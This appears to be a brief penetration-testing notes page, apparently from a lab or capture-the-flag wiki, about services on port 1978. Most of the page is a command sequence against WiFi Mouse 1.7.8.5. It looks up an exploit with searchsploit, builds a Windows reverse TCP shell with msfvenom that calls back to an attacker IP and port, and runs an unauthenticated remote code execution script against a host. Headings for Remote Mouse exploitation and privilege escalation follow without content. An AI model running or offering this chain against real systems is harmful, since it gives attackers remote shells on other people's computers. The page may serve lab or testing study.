1978 - WiFi Mouse
WiFi Mouse
Unauthenticated RCE
# Search for PoC
$ searchsploit WiFi Mouse
WiFi Mouse 1.7.8.5 - Remote Code Execution(v2) | windows/remote/50972.py
# Generate the payload
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=4444 -f exe -o 1978.exe
# Use the exploit
$ python3 50972.py hermes 192.168.45.154:8888 1978.exeRemote Mouse
Unauthenticated RCE
Privilege Escalation (GUI)

Last updated